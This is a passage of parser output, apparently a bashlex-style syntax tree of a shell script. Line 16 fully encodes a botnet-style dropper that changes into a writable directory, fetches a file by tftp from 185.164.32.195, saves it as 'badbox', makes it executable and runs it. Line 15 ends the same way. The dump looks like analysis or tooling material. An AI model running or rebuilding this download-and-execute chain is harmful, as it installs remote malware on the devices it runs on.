    WordNode(lineno=15, pos=(1512, 1513), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1513, 1514)),
  CommandNode(lineno=15, pos=(1514, 1522), parts=[
    WordNode(lineno=15, pos=(1514, 1522), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1523, 1647), parts=[
  CommandNode(lineno=16, pos=(1523, 1530), parts=[
    WordNode(lineno=16, pos=(1523, 1525), word='cd'),
    WordNode(lineno=16, pos=(1526, 1530), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1531, 1533)),
  CommandNode(lineno=16, pos=(1534, 1545), parts=[
    WordNode(lineno=16, pos=(1534, 1536), word='cd'),
    WordNode(lineno=16, pos=(1537, 1545), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1546, 1548)),
  CommandNode(lineno=16, pos=(1549, 1556), parts=[
    WordNode(lineno=16, pos=(1549, 1551), word='cd'),
    WordNode(lineno=16, pos=(1552, 1556), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1557, 1559)),
  CommandNode(lineno=16, pos=(1560, 1568), parts=[
    WordNode(lineno=16, pos=(1560, 1562), word='cd'),
    WordNode(lineno=16, pos=(1563, 1568), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1569, 1571)),
  CommandNode(lineno=16, pos=(1572, 1576), parts=[
    WordNode(lineno=16, pos=(1572, 1574), word='cd'),
    WordNode(lineno=16, pos=(1575, 1576), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1576, 1577)),
  CommandNode(lineno=16, pos=(1578, 1609), parts=[
    WordNode(lineno=16, pos=(1578, 1582), word='tftp'),
    WordNode(lineno=16, pos=(1583, 1585), word='-r'),
    WordNode(lineno=16, pos=(1586, 1591), word='sdfvc'),
    WordNode(lineno=16, pos=(1592, 1594), word='-g'),
    WordNode(lineno=16, pos=(1595, 1609), word='185.164.32.195'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1609, 1610)),
  CommandNode(lineno=16, pos=(1610, 1627), parts=[
    WordNode(lineno=16, pos=(1610, 1613), word='cat'),
    WordNode(lineno=16, pos=(1614, 1619), word='sdfvc'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1621, 1627), word='badbox'), pos=(1620, 1627), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1627, 1628)),
  CommandNode(lineno=16, pos=(1628, 1638), parts=[
    WordNode(lineno=16, pos=(1628, 1633), word='chmod'),
    WordNode(lineno=16, pos=(1634, 1636), word='+x'),
    WordNode(lineno=16, pos=(1637, 1638), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1638, 1639)),
  CommandNode(lineno=16, pos=(1639, 1647), parts=[
    WordNode(lineno=16, pos=(1639, 1647), word='./badbox'),
  ]),
])
